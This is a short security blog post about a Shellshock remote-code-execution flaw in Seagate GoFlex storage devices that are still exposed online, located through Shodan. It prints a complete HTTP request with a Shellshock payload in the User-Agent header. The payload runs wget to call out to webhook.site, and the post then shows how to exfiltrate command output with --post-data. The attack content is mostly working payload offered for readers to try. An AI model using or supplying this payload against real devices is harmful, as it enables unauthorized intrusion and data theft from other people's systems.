Wednesday, September 4, 2024

Getting a remote shell on Seagate GoFlex devices is still a thing almost ten years later!

Since I have been on a stroll down memory lane, I thought it would be fun to also revisit some of the bigger issues I have reported on in the past, like Getting a remote shell on any one of 68,000+ Seagate GoFlex devices. I found these devices are still plentiful on Shodan and despite all the time that has past. That's not all as they now easier to verify thanks to web services like webhook.site. In the past verifying you had RCE with these devices and the Shellshock bug in general could be tricky, but having something available to the public that catches callbacks makes it so much simpler. 

Here is what the new payload looks like using webhook.site:

GET /support/ HTTP/1.1

Host: vuln.device.ip.here

User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo;

 PATH=/usr/bin:/usr/local/bin:/bin; export PATH; wget

 http://webhook.site/866285eb-9c4f-4269-997c-6c4d3a960139/a -O /tmp/junk2>&1;

Here is what it looks like when it hits webhook:







If your testing this out your self and using webhook to verify execution, and you see something like the above on your webhook session, w00t! You have just successfully verified its vulnerable to shellshock, it has wget installed and its allowed to make calls outside of its network!

Going a bit further you can also exploit this Shellshock webhook.site combo to exfiltrate some information from our target by adding the --post-data flag to our wget payload with a bash command surrounded by backticks, like this:

--post-data `id`

wget will send the output of the command as post data to webhook :)  

It blows my mind we can still find these on the internets, and even more so that after 9 years no one is patching anything. If you have devices in your network, please for the love of all that is good, update your firmware! 

That's it for now, enjoy the 1's and 0's